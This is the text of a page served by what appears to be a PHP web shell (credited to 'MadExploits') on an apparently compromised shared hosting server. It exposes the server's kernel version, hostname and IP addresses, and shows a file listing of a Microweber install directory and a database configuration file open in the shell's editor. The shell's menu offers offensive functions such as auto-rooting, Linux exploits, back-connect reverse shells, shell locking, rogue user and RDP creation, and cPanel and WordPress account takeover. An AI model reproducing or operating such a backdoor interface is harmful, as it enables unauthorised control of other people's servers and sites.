Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.142.250.86
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
microweber /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
app.php
589
B
-rw-r--r--
changelog.txt
2.13
KB
-rw-r--r--
clone.php
5.27
KB
-rw-r--r--
database.php
1.37
KB
-rw-r--r--
edit.php
4.63
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
10.73
KB
-rw-r--r--
fileindex.php
626
B
-rw-r--r--
import.php
3.09
KB
-rw-r--r--
info.xml
4.01
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
7.5
KB
-rw-r--r--
install.xml
754
B
-rw-r--r--
install_item_log.txt
29
B
-rw-r--r--
md5
2
KB
-rw-r--r--
microweber.php
280
B
-rw-r--r--
microweber.sql
222.44
KB
-rw-r--r--
microweber.zip
292.44
MB
-rw-r--r--
notes.txt
720
B
-rw-r--r--
soft_delete.php
3.03
KB
-rw-r--r--
update_pass.php
540
B
-rw-r--r--
upgrade.php
6.49
KB
-rw-r--r--
upgrade.xml
409
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : database.php
<?php return array ( 'fetch' => 8, 'default' => 'mysql', 'connections' => array ( 'sqlite' => array ( 'driver' => 'sqlite', 'database' => storage_path().DIRECTORY_SEPARATOR.'database.sqlite', 'prefix' => '', ), 'mysql' => array ( 'driver' => 'mysql', 'url' => NULL, 'host' => '[[softdbhost]]', 'database' => '[[softdb]]', 'username' => '[[softdbuser]]', 'password' => '[[softdbpass]]', 'charset' => 'utf8', 'collation' => 'utf8_unicode_ci', 'prefix' => '[[dbprefix]]', 'prefix_indexes' => true, 'strict' => false, ), 'pgsql' => array ( 'driver' => 'pgsql', 'url' => NULL, 'host' => '127.0.0.1', 'port' => '5432', 'database' => 'laravel', 'username' => 'root', 'password' => '', 'charset' => 'utf8', 'prefix' => '', 'prefix_indexes' => true, 'search_path' => 'public', 'sslmode' => 'prefer', ), 'sqlsrv' => array ( 'driver' => 'sqlsrv', 'host' => 'localhost', 'database' => 'database', 'username' => 'root', 'password' => '', 'prefix' => '', ), ), 'migrations' => 'migrations', 'redis' => array ( 'cluster' => false, 'default' => array ( 'host' => '127.0.0.1', 'port' => 6379, 'database' => 0, ), ), );
Close